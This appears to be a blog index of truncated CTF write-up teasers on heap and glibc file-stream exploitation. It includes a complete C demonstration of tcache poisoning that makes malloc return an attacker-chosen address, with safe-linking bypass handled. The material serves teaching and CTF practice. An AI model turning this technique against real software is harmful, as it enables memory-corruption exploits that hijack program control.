chip8
Solves: 24 Easy
I just found a repo of a chip-8 emulator, it may be vulnerable but I didn't have enough time to report the vulnerability with a working PoC. You must find a way to get the flag in memory on the remote service!
Author: Express#8049
Remote service at : nc 51.254.39.184 1337
chip8 is an emulator-pwn challenge I did during the pwnme CTF. You can find the related files here.
Code review
This challenge is based on an emulator called c8emu that is updated with these lines of co...
Heap-Hop
Solves: 31 Medium
Heap exploitation is cool, and the best is when no free is used. Try to pwn the challenge and get the flag remotely.
Note:
You must spawn an instance to solve this challenge. You can connect to it with netcat: nc IP PORT
Author: Express#8049
Remote service at : nc 51.254.39.184 1336
Heap-hop is a heap exploitation challenge I did during the pwnme CTF. It involved classic tricks like tcache poisoning and GOT hijacking. You can find the related files here.
TL...
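The tcache poisoning trick named above, as an added stand-alone illustration that is not code from the Heap-hop write-up or from the challenge binary. It assumes a glibc with tcache (2.26 or later) and accounts for the safe-linking pointer mangling introduced in glibc 2.32; the request size 0x40, the static buffer `target` (standing in for the GOT entry an exploit would aim at) and the direct write into a freed chunk (standing in for the challenge's real memory-corruption primitive) are all assumptions of this example.

```c
// Added example: tcache poisoning against the running glibc (not the write-up's code).
// Two chunks of one size class are freed so the tcache bin holds b -> a; the
// `next` pointer of b is then overwritten (simulated use-after-free write) so that
// the second malloc of that size hands back `target`, memory malloc never owned.
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CHUNK_REQ 0x40  /* assumed request size: 0x50 chunk, served from the tcache */

/* Fake target (a GOT entry in the real challenge). tcache_get on glibc >= 2.32
   aborts on an unaligned entry, so keep it 16-byte aligned. */
static uint8_t target[64] __attribute__((aligned(16)));

/* glibc >= 2.32 safe-linking stores next as (&next >> 12) ^ next;
   older versions store the raw pointer. */
static uintptr_t mangle_next(void *next_location, void *next)
{
#if defined(__GLIBC__) && (__GLIBC__ > 2 || (__GLIBC__ == 2 && __GLIBC_MINOR__ >= 32))
    return ((uintptr_t)next_location >> 12) ^ (uintptr_t)next;
#else
    (void)next_location;
    return (uintptr_t)next;
#endif
}

/* Runs the poisoning sequence and returns the pointer from the second malloc.
   On success that pointer is `target`; NULL means the layout did not behave as assumed. */
void *tcache_poison_demo(void)
{
    char *a = malloc(CHUNK_REQ);
    char *b = malloc(CHUNK_REQ);
    if (!a || !b)
        return NULL;

    free(a);   /* bin: a */
    free(b);   /* bin: b -> a, b is the head and its first 8 bytes are `next` */

    /* Simulated vulnerable write: point b->next at target (mangled if required). */
    uintptr_t fake_next = mangle_next(b, target);
    memcpy(b, &fake_next, sizeof fake_next);

    void *first = malloc(CHUNK_REQ);   /* returns b; the bin head becomes target */
    if (first != (void *)b)
        return NULL;
    return malloc(CHUNK_REQ);          /* returns target */
}

int main(void)
{
    void *p = tcache_poison_demo();
    printf("target=%p malloc returned %p (%s)\n", (void *)target, p,
           p == (void *)target ? "poisoned" : "not poisoned");
    return p == (void *)target ? 0 : 1;
}
```

In the challenge the head chunk's `next` would be aimed at a GOT slot instead of `target`, and the write into it would come from the binary's own bug; everything else (two frees into one bin, one corrupted link, two allocations) is the same sequence. Without the version guard, an unmangled pointer on glibc 2.32+ is decoded to garbage and the second malloc aborts with "unaligned tcache chunk detected".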
Introduction
File streams are now a very common attack surface; here is a high-level introduction that should help you understand the design of the known attacks beyond reading the code of one particular function. I already talked about FSOP here. This article reviews glibc 2.36. Most of it comes from this awesome series of articles about the _IO_FILE structure.
Global design
As said in my previous writeup:
Basically on Linux "everything is a file", from a character device to any stream...
Introduction
babyfile is a file stream exploitation challenge I did during the SECCON CTF 2022 Quals event. I didn't manage to flag it within the 24 hours :(. But anyway I hope this write-up will be interesting to read, given that I show another way to gain code execution, one I had not seen before, based on _IO_obstack_jumps! The related files can be found here. If you're not familiar with file stream internals, I advise you to read my previous writeups about file stream exploitation, especially this one and...